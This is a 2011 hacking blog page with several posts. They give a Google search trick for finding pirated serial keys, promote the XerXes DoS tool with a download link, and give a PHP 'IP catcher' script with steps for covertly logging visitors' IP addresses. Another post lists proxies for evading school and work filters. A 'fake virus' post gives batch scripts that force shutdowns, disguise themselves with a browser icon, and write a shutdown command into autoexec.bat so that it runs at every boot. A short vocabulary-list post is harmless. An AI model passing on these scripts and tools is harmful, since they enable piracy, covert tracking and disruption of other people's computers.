Saturday, October 29, 2011

Find Serial keys OR cracks 4 any software or game


There is a vast number of websites out there, where you can find serial numbers and cracks for any program,
but most of them aren't safe to use. 
Actually most of them are spam sites that “bombard” you with full-screen popup ads, or commandeer your computer into a spam-loving Kraken or Srizbi Bot-net army. 
In this post I will show you the most efficient way of downloading cracks and serial numbers without any risk to your PC. This is the part of Hacking/Cracking using "Google hacking".

Google hacking means how you can search all desired information using some Google searching tricks.

Finding Serial Key using Google :

To Get the serial number from google you have to just follow these steps :

1) Go to Google.

2) In the search field type : "Software name" 94FBR

* Where, "Software Name" is the name of the item you want to find the serial number for.
* For example "Photoshop 7" 94FBR

3) Now in search results, You will find sort list of websites where you can get product key.


Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro.
 By searching for the product name and 94fbr, the pages that are returned are pages dealing specifically with the product you're searching a serial for.

List of  Serials Search Engines:


Powerful Dos Tool XerXes | th3j35t3r's DOS tool

XerXes is one of the most powerful private dos tools.
This tool was used by "th3j35t3r" to Hit WikiLeaks Site DoS Attack.
The "Jester" claims the XerXeS attack can successfully disable most of websites.

Source Code:  DOWNLOAD ( Password Protected ) 

Create own IP Catcher/tracer

Many People are very curious to know the ip of the friend we are chatting using Google talk, Yahoo, Facebook though they don't know how to use it in a good or a bad way. I will In this article show you how to steal/trace ip using a PHP script

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk. :)

check live example here live ip log

How to steal/trace a Ip adress??
Register a Free hosting at 110mb or byethost and follow the steps.




    $file = "ips.txt";

    $f=fopen($file, 'a');




    <p>Error! Try again </p>



 Save it as xxx.php


$dt = date("l dS \of F Y h:i:s A");
$file=fopen("ips.txt","a");  //ips.txt = Where it needs to save to. Here it must be hosted in same map !
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
header( 'Location:' ) ; // = Site where it needs to redirected to

 Save it as xxx.php

1.) First of all you need to make a new .txt document on the website you're uploading this to. Name it ips.txt (You can change that in the script. Where it says $file = 'ips.txt'; in the second line)(which i have done already) . Then change the CHMOD to 777.

2.) Now you need to paste the script above in to a xxx.php document, and upload it.

3.) Now you make people visit your site, and they will see only "Error! Try again" ! (for code 1)

4.) To view the IP, you simply add "/ips.txt" after your domain, and you'll see the IP.

Share it give a like :)

Sunday, October 23, 2011

proxy servers

* In computer networks, a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol. If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client. A proxy server may optionally alter the client's request or the server's response, and sometimes it may serve the request without contacting the specified server. In this case, it 'caches' responses from the remote server, and returns subsequent requests for the same content directly.

The proxy concept was invented in the early days of distributed systems as a way to simplify and control their complexity. Today, most proxies are a web proxy, allowing access to content on the World Wide Web.


A proxy server has a large variety of potential purposes, including:
  •     To keep machines behind it anonymous, mainly for security.[2]
  •     To speed up access to resources (using caching). Web proxies are commonly used to cache web pages from a web server.[3]
  •     To apply access policy to network services or content, e.g. to block undesired sites.
  •     To access sites prohibited or filtered by your ISP or institution.
  •     To log / audit usage, i.e. to provide company employee Internet usage reporting.
  •     To bypass security / parental controls.
  •     To circumvent Internet filtering to access content otherwise blocked by governments.[4]
  •     To scan transmitted content for malware before delivery.
  •     To scan outbound content, e.g., for data leak protection.
  •     To allow a web site to make web requests to externally hosted resources (e.g. images, music files, etc.) when cross-domain restrictions prohibit the web site from linking directly to the outside domains. * source wikipedia *

So here is the List of best anonymizers and proxy servers & bypass web-filters !

ShadowBrowser – anonymously surf the internet and protect your Internet history at the same time. No software to download and supports SSL websites.
Anonymouse – a very good free anonymizer. By using this CGI proxy you can anonymously surf web pages, send anonymous e-mails and look at news.
URL (for proxy chaining): – Anonymous private surfing service, hide your ip, manage website ads, referrers and cookies through this free web based proxy.
URL (for proxy chaining): – Free webbased proxy. By using this proxy you can surf the Internet securely and safely. This anonymizer service keeps websites from tracking your internet movements by preventing them from placing cookies on your home computer.
URL (for proxy-chains): – Free anonymous browsing, for the times when you REALLY need to hide your ass online!
URL (for proxy chaining): – Proxy Foxy offers you free anonymous surfing. With our free tool you can surf the Internet safe and secure without revealing your identity. Avoid cookies, spyware and other malicious scripts.
URL (for making proxy chaining):
78Y.NET – It is a web anonymous web proxy designed to bypass proxy restrictions through a web interface. If, for example, in your university, college, job, etc, the IT department blocks a lot of harmless websites simply because of their popularity, so you can use 78Y.NET proxy service to access those websites.
URL (to create proxy chains): - 75I.NET is anonymous CGI Proxy that allows anyone to surf the Internet privately and securely without any restrictions. 75I.NET anonymous web surfing proxy service is free.
URL (to create chains of proxies): – This anonymizer always hides your IP address, so all sites will not be able to uniquely your identify or track you. You’re able to access from your school, college, university, etc, the websites, which are restricted by your IT department.
URL (for proxy chaining):
Proxy Guy – The Proxy Guy offers free anonymous surfing. Now you can surf safe and secure with the click of a button.
URL (for making proxy chaining): – Games Proxy helps you to play all your favourite flash games free online by using fast secure web proxy. Apart from playing free flash games you can also use Games Proxy to browse all your favourite sites such as ebay, hotmail & more! – It is a free internet service which allows you to surf anonymously and it “changes” your ip. You can also use it to access/bypass blocked websites on your school or office.
URL (for making proxy chaining): – Anti-firewall redirector. It allows to hide your IP and a name and a type of the file you gets from internet. Now corporate internet firewall will not be able to determine your internet activity. – Fast and Secure US Proxy. PHP Based, and very easy to use. Completely free, and will keep you anonymous while browsing the internet.
URL (for making proxy chaining): – This is a free CGI proxy with HTTPS support. This service also includes the usual features including removing client side scripting, showing text only and enabling or disabling cookies. It also supports rotate13 or base64 URL encoding. Mirror1 Mirror2 Mirror3 Mirror4
URL (for making proxy chaining): – This is a free, safe, anonymous web proxy with configurable options. Browsing anonymously with increases your security and lets you access web sites from behind a firewall.
URL (for making proxy chains):

 It is a free anonymous web based proxy service. With Ninja Proxy you can browse your favorite web sites anonymously and even from behind a firewall with blocked ports.
URL (for making proxy chains):
ShadowSurf free anonymous proxy – Surf privately and 100% anonymously with ShadowSurf’s FREE web proxy. You can access blocked sites while keeping your IP secret. No software needed.
URL (for making proxy chaining): Proxy – Free browser based anonymizer without any software. Bypass bans and hide your ip through proxy.
URL (for making proxy chains): -
 Free proxy site with a cgi proxy tool, daily updated proxy lists and information on anonymous and https proxy servers.
URL (for creating proxy chain): – Proxy Spy protects your privacy and keeps your computer secure by allowing you without revealing your IP address or personal information. Proxy Spy has a range of features including disabling javascript, encoding URLs to bypass filters, disable showing of images, reject cookies etc. Proxy Spy is hosted on a fast server with high uptime – this means you can always count on it, day or night, to protect you. – TheProxy always hides your IP address, so all sites will not be able to uniquely your identify or track you. It`s absolutely free. Mirror Mirror1
URL (for making proxy chains): – Very fast US based PHP proxy. Very easy to use, and very quick. ProxyPrince will keep you safe and secure. Anonimity is our main concern, your tracks are sure to be kept hidden. – Free anonymous web proxy. Bypass blocked websites and browse privately at work or school. Shields you against cookies, spyware and malicious scripts. – Free Anonymous Browsing. Hide your IP and get past school and work filters.
Clever Proxy – Clever Proxy is a smart and intelligent web-based proxy service. It allows you to remain anonymous whilst using the internet. By using this anonymizer you will also be protecting your computer because when you surf anonymously people cannot find out your IP address and attempt to hack you.
A Proxy Site – A Proxy Site is a simple and reliable web-based anonymizer. By using it you can bypass filters and remain completely anonymous whilst surfing the internet. It has many features including blocking JavaScript and cookies.
Fully Sick Proxy – Fully Sick proxy allows you to remain anonymous on the internet by routing web requests for you. This means you can stay protected and also disable javascript and block cookies. Our site is fast and reliable too.
Desire Proxy – Desire proxy is a premium free anonymous proxy. It provides many of the features of the paid services for nothing! These include cookie removal, no image browsing and more. Keep anonymous and keep secure with Desire Proxy. We know what you desire!
Perfect Proxy – Perfect Proxy is just that – perfect! It provides excellent reliability and website support and also keeps you anonymous in the process. It has many additional features to add to the experience.

Prime Proxy – Prime Proxy provides a great free proxy service to the general public. It keeps you anonymous and safe whilst browsing your favorite websites. Prime Proxy is used by students and adults in many different situations. Try us today – it’s 100% free!
Proxy Aware – Since you’re visiting you must be proxy aware, so why not check out Proxy Aware? It’s a perfect free proxy which keeps you anonymous whilst browsing the web! It has many additional features such as cookie blocking, disabling images and URL encoding to bypass school and work filters.
Proxy Craze – At the moment there is a proxy craze going on, and Proxy Craze is proud to be part of it! With a delicious serving of features to make any proxy user cry, Proxy Craze is the proxy of choice! Features include URL encoding, cookie blocking / image blocking, and a neat interface!
Proxy Gasp – Our proxy is so good it will make you gasp – as the name suggests. To use this proxy simply type the URL into the website and gasp.your at the site remaining totally anonymous! This means websites cannot record your IP and later use it to hack or send you junk!
Proxy Please – Well, thanks for saying please! This is a great proxy site with all the usual features including cookie blocking, no images, URL encoding all whilst being extremely fast and reliable. If you want to bypass filters then this is the site you need!
Some Proxy – Easy to remember domain, great features, and nice and fast! Keeps you totally anonymous whilst browsing the internet, and allows you to bypass filters and school or at work. Features include URL encoding and cookie blocking!
Stupid Proxy – Despite the name, this proxy is anything but stupid! If you’re going to use a proxy, use Stupid Proxy! It’s no frills yet great to use including many simple features that will make your life easier including URL encoding (bypass filters) and image-less browsing. Enjoy!
That Proxy – Which proxy – this proxy? Why not! A bunch of excellent features, fast and reliable and a clean and neat design are all reasons why you should choose ‘That Proxy’! By using our site you will remain anonymous and avoid security issues like people hacking your computer.
Want Proxy – For you to be at this site you must want some proxy, so all you need to do is type that in, and finish it with a .com, and you’re done! ‘Want Proxy’ is an excellent proxy site that you’ll end up using all the time. It’s a favorite amongst students and workers who want to bypass filters. – Unblock MySpace is a free service created to view MySpace proxy website from school and work computers through a PHP and CGI backend (web based proxy). This site uses the server proxy IP for surfing the web anonymously. Protect your privacy! Surf Anonymously! Bypass Security Filters! Private Browsing! – Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers. – Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers. – is a free easy to use cgi proxy service that blocks cookies and hides your IP to keep you anonymous as you surf the web. – ProxyDetective – Simple and Free cgi-webbased anonymous proxy surfing. Surf safely from your work, school or home. – Access your webmail, myspace, and much more in school or work anonymously. – Access blocked websites in school or work safely and anonymously. Surf with Ad Free Browsing Pages! – We do not sleep until you have a safe route. Use us at school, work or home. We can bypass most filters. – Hide your movements via our anonymous proxy. Our proxy will bypass school and work filters. – We allow you to bypass your school and work filters to allow you surf the internet anonymously.
Other anonymizers
Anonymization – free web anonymyzer. Supports anonymous web surfing, anonymous web seek (meta search by many search engines) and FTP surf – surf anonymously in any FTP server. By using this web proxy you can surf anonymously more than web pages.
URL (for proxy chaining):
Guardster – good anonymizer. Controls cookies, scripts, ADs, images and referrers.
URL (for proxy chaining):
ProxyWeb – good anonymizer, can delete Java, JavaScript, cookies and ActiveX. Also this web proxy uses HTTPS (secure) connection – so nobody can detect what you download from Internet.
URL (for proxy chaining):
WebWarper – This is a popular free web anonymizer. This CGI proxy can pack web pages “on the fly”.
URL (for proxy chaining):
MegaProxy – Free anonymizer can work with HTTPS sites.
URL (for proxy chaining): – free web based anonymizing proxy. Instant access, no download, no registration, and no fee required.
URL (for proxy chaining):
Anonymizer.RU – russian anonymizer: this russian CGI proxy has many additional options only after registration.
URL (for proxy chaining):
The-cloak – This is a free CGI proxy. This anonymizer supports HTTP, FTP and HTTPS sessions. Can hide referrers. Requires payment..
URL (for chaining proxy):
Pure privacy – cool anonymizer + remailer. You can use this anonymizer to send anonymous e-mails (by using this anonymizer with anonymous proxy)
URL (for proxy chaining): – Good fast anonymizer that can remove cookies, ADs, referrers and can use HTTPS connections.
URL (for proxy chaining):– The better cgi proxy server. It has many different features, inclusive enabling / disabling cookies, all scripts, AD banners, referrer information, browser and OS info and many more.
URL (for cgi proxy chaining): – Good cgi proxy (anonymizer). It uses 128-bit SSL-encoding. Can enable/lock Java, JavaScript, Cookies, ActiveX.
URL (for creating anonymizers chain):– Mirror – Psurf is one of the fatest proxy services on the net. Using new and advanced technology to help you bypass your school firewalls and filters. Allowing you to view what you want, when you want!– The 121 relationship between you and annonimity. Fast, reliable and secure! Mirror1

SHARE IT if u like :)

Tuesday, October 18, 2011

Make a Fake and Harmless Virus


  • Right-click on your desktop, go to "new" and click "Create Shortcut"

  •     A window will come up. Where it says "Location" enter: shutdown -s -t

  •     The rest of the location is customizable. After the -t, press space and enter the amount of time you want someone to have until shutdown in seconds with only numbers when virus is activated. Press space and enter -c then another space and in quotations, type in a comment that will appear when the computer is shutting down. Click "Next". (example: shutdown -s -t 10 -c "WARNING: VIRUS DETECTED. BEGIN SHUTDOWN")

  •     On the next screen, name your virus whatever you want, it will still have the same effect. Click "OK".

  •     Your fake virus will be on your desktop as whatever you named it. Click to activate it. If done correctly a shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes.

  •     TO ABORT THE FAKE VIRUS YOU MUST click the Start button on your taskbar and click run. Then type in: shutdown -a

  •     Heres another way to make a virus, it's completely harmless, all it does is create a folder in your all programs menu and shutdown your pc =) Open notepad and save as whatever.bat:
  1.     cls
  2.     :A
  3.     color 0a
  4.     cls
  5.     @echo off
  6.     echo Wscript.Sleep
  7.     echo Wscript.Sleep 5000>C:\sleep5000.vbs
  8.     echo Wscript.Sleep 3000>C:\sleep3000.vbs
  9.     echo Wscript.Sleep 4000>C:\sleep4000.vbs
  10.     echo Wscript.Sleep 2000>C:\sleep2000.vbs
  11.     cd %systemroot%\System32
  12.     dir
  13.     cls
  14.     start /w wscript.exe C:\sleep3000.vbs
  15.     echo Deleting Critical System Files...
  16.     echo del *.*
  17.     start /w wscript.exe C:\sleep3000.vbs
  18.     echo Deletion Successful!
  19.     echo:
  20.     echo:
  21.     echo:
  22.     echo Deleting Root Partition...
  23.     start /w wscript.exe C:\sleep2000.vbs
  24.     echo del %SYSTEMROOT%
  25.     start /w wscript.exe C:\sleep4000.vbs
  26.     echo Deletion Successful!
  27.     start /w wscript.exe C:\sleep2000.vbs
  28.     echo:
  29.     echo:
  30.     echo:
  31.     echo Creating Directory h4x...
  32.     cd C:\Documents and Settings\All Users\Start Menu\Programs\
  33.     mkdir h4x
  34.     start /w wscript.exe C:\sleep3000.vbs
  35.     echo Directory Creation Successful!
  36.     echo:
  37.     echo:
  38.     echo:
  39.     echo Execution Attempt 1...
  40.     start /w wscript.exe C:\sleep3000.vbs
  41.     echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
  42.     echo start hax.exe
  43.     start /w wscript.exe C:\sleep3000.vbs
  44.     echo Virus Executed!
  45.     echo:
  46.     echo:
  47.     echo:
  48.     start /w wscript.exe C:\sleep2000.vbs
  49.     echo Disabling Windows Firewall...
  50.     start /w wscript.exe C:\sleep2000.vbs
  51.     echo Killing all processes...
  52.     start /w wscript.exe C:\sleep2000.vbs
  53.     echo Allowing virus to boot from startup...
  54.     start /w wscript.exe C:\sleep2000.vbs
  55.     echo:
  56.     echo:
  57.     echo Virus has been executed successfully!
  58.     start /w wscript.exe C:\sleep2000.vbs
  59.     echo:
  60.     echo Have fun!
  61.     start /w wscript.exe C:\sleep2000.vbs
  62.     pause
  63.     shutdown -f -s 10 -c "Your computer has committed suicide. Have a nice day."
    For a way to have a bunch of Command Prompts pop up out of nowhere go to notepad and type in "start" alot (don't add quotations)
    Save it as whatever.bat to your desktop
    When you open it however many times you typed "start" thats how many times the command prompt will pop up
    You can disquise it as the Internet Explorer by right clicking on the fake virus and hit properties and find the button that says "Change Icon" then find the internet explorer (or mozilla firefox if you prefer or if you have the icon) icon and double click it
    It should change automatically after you hit OK
    To get rid of them all at once wait until it all stops popping up then click CTRL+ALT+DEL and go to task manager and click the top task and hold down CTRL+SHIFT and go down to the last task and then click it (all the tasks should be highlighted) then click "end task" and it should erase all the tasks (now here are the 50 starts)

    Only do this to someone who can handle this prank.
    This may not work if you try to do a file transfer on windows live messenger
    It also may scare people really badly, so remember do this for revenge(e.g someone did a mean prank so then you could use this)
    The example provided can run on Windows.
    This is not completely harmless, since it will shutdown your PC and force you to lose any unsaved work.Rest assured all should be normal when the computer is turned on again.
    This might affect the way your computer runs or the way another computer that you hacked runs. so only do this if you are a experienced hacker. also I suggest that you save all of your contents onto a thumb drive if you decide to test it out on your computer first.
    And remember this is in seconds not minutes. so don't type in -5 and think you'll be fine.
    use autoit scripts for exe files that look more real
    Try this one too..
    ╚○○○•••fOr fUn►vIRus►prOgs►tRicKz•••○○○╝

    1♥open notepad (Start ►run ► notepad)

    2♥ copy this code and paste it (Just copy it dont try 2 edit it)

    @echo off
    echo shutdown -s -f -t 0 >> c:/autoexec.bat

    3♥ click file ►Save As and type SACH.BAT
    and for the save as type select ☺ all files ☺

    4♥ Then click save

    5♥ lolz you made a virus :D

    6♥ now run sach.bat after 5 or 6 seconds your anti virus will come up with a message saying that they have detect a trojan horse virus LOL :D

     use autoit scripts for exe files that look more real   

Monday, October 10, 2011

Vocabulary Word List

                                    ◄   500+  IELTS, GRE, Toefl Exam Word List 


Easy to print out and study on the go! Start Learning Now!

                                  Download Now  

Related Posts Plugin for WordPress, Blogger...

IP info



study (19) education (18) coding (11) Codes (9) ciphers (9) cryptology (9) CRYPTOGRAPHY (8) Hacking Tutorials (5) Ethical hacker/hacking (4) Exploits and Incident Handling (4) HACKING WINDOWS (4) Make A Cipher (4) Windows (4) password breakers/crackers (4) Dictionary (3) Ebook (3) Facebook (3) Facebook Emoticons (3) Google Dork (3) Google Hacks (3) facebook symbols (3) php hack (3) tools (3) ASCII art (2) Facebook Animated Gif Image Status (2) GRE (2) GRE Dictionary (2) Hack a Website (2) IELTS (2) Java: A Beginner's Guide (2) Password Cracking (2) Password Recovery (2) SOCIAL ENGINEERING TOOLKIT (2) Session hijacking (2) find the vulnerability (2) java (2) password-auditing (2) password-cracker (2) php (2) Abel (1) Backtrack 5 (1) Barron’s GRE word list (1) Breaking Ciphers (1) CIPHERTEXT (1) CRYPTANALYSIS (1) Caesar's Shift Cipher (1) Cain (1) Cain and Abel (1) Crypters Binders RC4 (1) DOS (1) Facebook Chat Text Generator (1) Fast leech generator (1) Hacking Tools (1) HconSTF (1) List of best anonymizers (1) Make fake virus (1) Number Shift Cipher (1) One Pig's Pen (1) RFI (1) Remote file inclusion (1) SEO (1) SQL injection (1) Security 504 Hacker Techniques (1) Steal/trace ip (1) The Key (1) The Rail Fences (1) Toefl (1) Uses of proxy server (1) Virus (1) Vocabulary Word List (1) Winding Way Cipher (1) blog tips (1) brute force (1) brute forcing. (1) brutus (1) brutus-aet2 (1) (1) brutus-password-cracker (1) bypass web-filters (1) chat (1) command prompt (1) cookie stealing (1) crackers (1) e (1) fast download (1) hacking-software (1) hot file (1) improve site (1) ip catcher (1) ip tracker (1) leech (1) leecher (1) list of proxy servers (1) mail (1) mega upload (1) mobile (1) network-sniffing (1) rapid share (1) regular download link into premium (1) serial keys 94fbr (1) symbols (1) th3j35t3r's DOS tool (1)



☁ Partners Link Cloud ☁